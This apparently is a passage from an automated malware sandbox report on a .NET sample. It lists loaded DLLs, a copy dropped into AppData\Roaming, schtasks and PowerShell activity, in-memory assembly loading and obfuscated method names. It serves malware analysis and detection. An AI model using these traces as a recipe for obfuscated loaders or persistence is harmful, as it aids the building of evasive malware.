                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PzPxqbK89H.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PzPxqbK89H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: PzPxqbK89H.exe, Form1.cs.Net Code: InitializeComponent
                    Source: 0.2.PzPxqbK89H.exe.3428dc0.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, TDwrK4xy1eTvVE6hUY.cs.Net Code: UOYCntAsxY System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, TDwrK4xy1eTvVE6hUY.cs.Net Code: UOYCntAsxY System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PzPxqbK89H.exe.5ca0000.5.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_019EEDD8 push eax; retf 0_2_019EEDD9
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_019EDBFC push eax; ret 0_2_019EDC05
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_0589758E pushfd ; retf 0_2_05897595
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_058975BE pushfd ; retf 0_2_058975BF
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeCode function: 0_2_058975EA pushfd ; retf 0_2_058975F1
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeCode function: 10_2_0099EDD8 push eax; retf 10_2_0099EDD9
                    Source: PzPxqbK89H.exeStatic PE information: section name: .text entropy: 7.969533865174248
                    Source: VzwumYUBCtHW.exe.0.drStatic PE information: section name: .text entropy: 7.969533865174248
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, jVTKibClZivvWCFDO5.csHigh entropy of concatenated method names: 'QdE29mnWLD', 'dkG2xS2GSn', 'nnx2dJaKh7', 'yq02jmswHw', 'BqZ2yXYPnB', 'qad2NLcFTr', 'WUrbBnkwnFVWmuqO0H', 'VbQ0HJenl480HmEE0k', 'cpE22SP9Uw', 'NDK2gfl0HW'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, FnBXadwLcFTr7T1Qgj.csHigh entropy of concatenated method names: 'IJTbojhh3J', 'Tvsb0dENuZ', 'CVibuigBM3', 'a2ab9ccfGu', 'rMQbxf6yOV', 'apOu72TK9k', 'y9AufTViFj', 'VNyuinkisy', 'pJHu4PRdyp', 'QTBuvAWXg1'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, rmnWLDrgkGS2GSn6Lw.csHigh entropy of concatenated method names: 'qlj0h0yjBg', 'VN10SD6bSc', 'tyc0BMqAcX', 'nXA08xLolD', 'ftg07PjB8k', 'XQU0fXpuHR', 'o6V0i7hJVd', 'yGs047gMJi', 'fCN0vAVFJq', 'VIJ0H6Dhhg'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, HPlWakIhjgTZWRLUf0.csHigh entropy of concatenated method names: 'aPderi7KUL', 'KfIeDvPHkk', 'kEXewlZ0Xe', 'tiSeQ9f5nb', 'nbve3CCetu', 'b3ne1NGfEi', 'udkeUjHsEU', 'YgOeV2j9w9', 'Pg0eLM37Sc', 'GPoemAOyjO'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, DwI7glUTkpFXdbFb5c.csHigh entropy of concatenated method names: 'deL95PPb3B', 'gO096yblX6', 'xpE9budRJ3', 'JAmbHCpny6', 'dtWbzGn24b', 'DgJ9YiABYV', 'moI92eMTbp', 'w6w9JvL1vY', 'YVk9gElSWs', 'N8Q9CrFpVV'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, nAqk6E2YtO49DXa3o1V.csHigh entropy of concatenated method names: 'Mr8TcoHoHp', 'JLXTkeQ3Dk', 'MdpTnSBCd3', 'BOeTKLW57W', 'AjZTAqAgrL', 'M3ATtb9gRa', 'Rm1Ts9qZYT', 'LHVTr1Jjsc', 'rWQTDNeewu', 'dqWTPMe6d9'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, CwHwJwPKnG270AqZXY.csHigh entropy of concatenated method names: 'vxAuAhh4r4', 'cJ6usoQu1E', 'K8w6OeXlaM', 'a0k63oHRwZ', 'qg761CuN0B', 'evw6GaOoEQ', 'O4W6UNMB1H', 'FxK6VtPmUV', 'kgE6FLnuYK', 'KPN6LMdqLG'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, ELRVVHvbDskkQkHGid.csHigh entropy of concatenated method names: 'W43EwuiHpj', 'GaDEQVCrlM', 'OufEOkhknY', 'tu2E3stKTC', 'vylEh7WdeE', 'hWnE1oUpGQ', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, uB9MfxH0bndo5Grgpb.csHigh entropy of concatenated method names: 'oxaT24UN1D', 'UwYTgr2Sjx', 'IADTCZOMhR', 'FabT5CA0G8', 'Q5cT0rdT1N', 'RLFTuFqQgF', 'P2HTb1KvGD', 'XcNEi8Nx5m', 'HnpE4bRBSY', 's6WEvNKQM1'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, GGVhu4FVl0LolwcnLO.csHigh entropy of concatenated method names: 'Mxb9cVsp2p', 'G2J9k9375m', 'yCD9ncg7mJ', 'Y9C9Ks3J3b', 'sSY9A22Ccr', 'bCk9tJkIPY', 'EAB9sAOIvi', 'Jwp9rtCLsA', 'kjp9D3QZex', 'sX69PV9nmp'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, TDwrK4xy1eTvVE6hUY.csHigh entropy of concatenated method names: 'wEigoMxmRB', 'BDeg5yHDSB', 'xk6g0rCoIZ', 'Vkvg6IaI0J', 'NxCguM9MDP', 'TTAgbTf2HN', 'DYvg9kXsWp', 'pslgx27miv', 'CPggWhqAs8', 'HHigdpqagB'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, HsrGlV44lLvBViRtCU.csHigh entropy of concatenated method names: 'eEmE56mcv1', 'nCcE0PNAC9', 'mQEE642m7M', 'aPREuwNgC0', 'N13EbNgWF6', 'AlVE99oDp3', 'OVHExraLc9', 'J2CEWo5ut6', 'tPXEd9opBA', 'rvWEj9Bq0v'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, hxdbkFBDOG3GYXCC6J.csHigh entropy of concatenated method names: 'ToString', 'DaONmYJpON', 'MDANQnT1CQ', 'TkmNOPPjen', 'MBFN3pLBEP', 'PIQN1Mdar1', 'H8yNGy95LZ', 'My5NU5Dp2c', 'jgrNV8sswV', 'VVZNF6iToB'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, ojhQbu8XUN2SA1YWIn.csHigh entropy of concatenated method names: 'ptiXdpFyiC', 's37XjtV83R', 'ToString', 'UIaX5RQAAE', 'Y07X0EIxO1', 'OWYX6yiegV', 'zywXuiKGYY', 'qPqXb31ZK6', 'y5TX9ajlLV', 'uQVXx9Js1b'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, W031NeDnxJaKh7kq0m.csHigh entropy of concatenated method names: 'm0P6KnjpwJ', 'C1R6tybQc5', 'LRj6ruwArP', 't4E6DnRvqG', 'dxy6y3GhN4', 'Ped6NEv4mA', 'yGy6XRLMF3', 'fuO6ER3fS5', 'c9n6TktAQC', 'S166pZnbNT'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, W92IZu2gnM5iBLPmiS8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q0Bphobp2C', 'PrgpS09pe0', 'IJLpBdNisU', 'CWLp8k7pEs', 'JSCp7bI3Sh', 'fhmpfmo0TT', 'K1vpijpUCc'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, Y9DXAaJuhWSHPRE4Ex.csHigh entropy of concatenated method names: 'w7YnMSgLC', 'D77Kk0FlJ', 'b96tmiT1r', 'H9msNbxGx', 'oiuDitd3m', 'v7vPg1b0Q', 'CqDeN6rErw82KPCB7j', 'YoK4FpWP4uIsWkNfxA', 'Lncefsw3BuGyDbf5bV', 'UbpEm1p7Q'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, EUgWJP05fVsWnH2ls3.csHigh entropy of concatenated method names: 'Dispose', 'KXH2v1bafu', 'R6UJQQxDqV', 'yygxxteD6Y', 'JQs2HrGlV4', 'tLv2zBViRt', 'ProcessDialogKey', 'dUDJYLRVVH', 'iDsJ2kkQkH', 'KidJJZB9Mf'
                    Source: 0.2.PzPxqbK89H.exe.4463190.4.raw.unpack, fhbI0kfI6Vya1Km65c.csHigh entropy of concatenated method names: 'KK9X4GeJ2k', 'K3wXHpC4LI', 'ADgEYnsshE', 'wAXE2hFIS8', 'ReVXm8baBj', 'vxXXabE2Jb', 'gUkXI7HqcD', 'hwoXh0uHl2', 'k9cXSYS54C', 'VSFXBrx37r'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, jVTKibClZivvWCFDO5.csHigh entropy of concatenated method names: 'QdE29mnWLD', 'dkG2xS2GSn', 'nnx2dJaKh7', 'yq02jmswHw', 'BqZ2yXYPnB', 'qad2NLcFTr', 'WUrbBnkwnFVWmuqO0H', 'VbQ0HJenl480HmEE0k', 'cpE22SP9Uw', 'NDK2gfl0HW'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, FnBXadwLcFTr7T1Qgj.csHigh entropy of concatenated method names: 'IJTbojhh3J', 'Tvsb0dENuZ', 'CVibuigBM3', 'a2ab9ccfGu', 'rMQbxf6yOV', 'apOu72TK9k', 'y9AufTViFj', 'VNyuinkisy', 'pJHu4PRdyp', 'QTBuvAWXg1'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, rmnWLDrgkGS2GSn6Lw.csHigh entropy of concatenated method names: 'qlj0h0yjBg', 'VN10SD6bSc', 'tyc0BMqAcX', 'nXA08xLolD', 'ftg07PjB8k', 'XQU0fXpuHR', 'o6V0i7hJVd', 'yGs047gMJi', 'fCN0vAVFJq', 'VIJ0H6Dhhg'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, HPlWakIhjgTZWRLUf0.csHigh entropy of concatenated method names: 'aPderi7KUL', 'KfIeDvPHkk', 'kEXewlZ0Xe', 'tiSeQ9f5nb', 'nbve3CCetu', 'b3ne1NGfEi', 'udkeUjHsEU', 'YgOeV2j9w9', 'Pg0eLM37Sc', 'GPoemAOyjO'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, DwI7glUTkpFXdbFb5c.csHigh entropy of concatenated method names: 'deL95PPb3B', 'gO096yblX6', 'xpE9budRJ3', 'JAmbHCpny6', 'dtWbzGn24b', 'DgJ9YiABYV', 'moI92eMTbp', 'w6w9JvL1vY', 'YVk9gElSWs', 'N8Q9CrFpVV'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, nAqk6E2YtO49DXa3o1V.csHigh entropy of concatenated method names: 'Mr8TcoHoHp', 'JLXTkeQ3Dk', 'MdpTnSBCd3', 'BOeTKLW57W', 'AjZTAqAgrL', 'M3ATtb9gRa', 'Rm1Ts9qZYT', 'LHVTr1Jjsc', 'rWQTDNeewu', 'dqWTPMe6d9'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, CwHwJwPKnG270AqZXY.csHigh entropy of concatenated method names: 'vxAuAhh4r4', 'cJ6usoQu1E', 'K8w6OeXlaM', 'a0k63oHRwZ', 'qg761CuN0B', 'evw6GaOoEQ', 'O4W6UNMB1H', 'FxK6VtPmUV', 'kgE6FLnuYK', 'KPN6LMdqLG'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, ELRVVHvbDskkQkHGid.csHigh entropy of concatenated method names: 'W43EwuiHpj', 'GaDEQVCrlM', 'OufEOkhknY', 'tu2E3stKTC', 'vylEh7WdeE', 'hWnE1oUpGQ', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, uB9MfxH0bndo5Grgpb.csHigh entropy of concatenated method names: 'oxaT24UN1D', 'UwYTgr2Sjx', 'IADTCZOMhR', 'FabT5CA0G8', 'Q5cT0rdT1N', 'RLFTuFqQgF', 'P2HTb1KvGD', 'XcNEi8Nx5m', 'HnpE4bRBSY', 's6WEvNKQM1'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, GGVhu4FVl0LolwcnLO.csHigh entropy of concatenated method names: 'Mxb9cVsp2p', 'G2J9k9375m', 'yCD9ncg7mJ', 'Y9C9Ks3J3b', 'sSY9A22Ccr', 'bCk9tJkIPY', 'EAB9sAOIvi', 'Jwp9rtCLsA', 'kjp9D3QZex', 'sX69PV9nmp'
                    Source: 0.2.PzPxqbK89H.exe.7bb0000.7.raw.unpack, TDwrK4xy1eTvVE6hUY.csHigh entropy of concatenated method names: 'wEigoMxmRB', 'BDeg5yHDSB', 'xk6g0rCoIZ', 'Vkvg6IaI0J', 'NxCguM9MDP', 'TTAgbTf2HN', 'DYvg9kXsWp', 'pslgx27miv', 'CPggWhqAs8', 'HHigdpqagB'
